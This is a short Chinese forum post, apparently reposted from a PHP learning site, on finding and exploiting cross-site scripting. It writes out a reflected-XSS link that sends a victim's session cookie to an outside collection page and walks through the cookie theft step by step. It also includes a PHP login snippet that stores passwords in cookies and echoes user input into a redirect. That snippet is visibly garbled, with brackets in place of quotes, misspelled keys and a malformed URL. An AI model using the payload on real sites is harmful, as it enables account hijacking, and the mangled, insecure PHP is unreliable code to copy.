马上我的论坛就要开放了,有点小激动!!,废话不多说了,看下文吧!! 背景:XSS也是老生长谈的话题了,其危害性呢,大家都懂的,刚看到几个黑阔的反射型和储存型的争论,恰好小白的我觉得呢,浅谈一下XSS的挖掘和利用,有利于学习的氛围 ! XSS: Cross Site Spripting – - 一般的攻击步骤: 1我们一般喜欢发送隐藏网站脚本的HTTP链接给目标:http://www.2cto.com /post.php?user=<script>document.location=]http://www.2cto.com /get.php?cookie=]+document.cookie;</script> 1 2:目标用户打开有xss 漏洞 的网站在登录期间打开了我们发送的隐藏跨站脚本的HTTP链接. 3:有xss的90se呢执行了这个http链接并且显示url参数user的值,这样跨站脚本就执行了. 4:跨站脚本将目标用户的 浏览器 地址专一到了我们的页面:http://www.2cto.com /get.php,目标用户浏览器的cookie数据被当作get.php网页的url参数cookie:http://www.2cto.com /get.php?cokie=document.cookie,从而让我们得到目标的cookie 简单挖掘:看下面代码 if($match_count) { setcookie([uername],$_POST["username"],time()+30*24*60*60) //将username字段的值存入cookie setcookie([uername],$_POST["username"],time()+30*24*60*60) //将password字段的值存入cookie mysql _free_result($result); mysql_close($link); // 跳转页面 header([Location:http//localhost/balck/black.php?user=] $_POST["username"])//在使用者登陆后,将当前页面跳转到black.php,back.php文件有url参数user,user值是来访者的帐号 } else { header([Location:http:// .$_SERVER["HTTP_HOST"][ $_SERVER["SCRIPT_NAME"]); 来自:90 sacret Team信息安全团队
查看更多关于浅谈xss的挖掘和利用 - 网站安全 - 自学php的详细内容...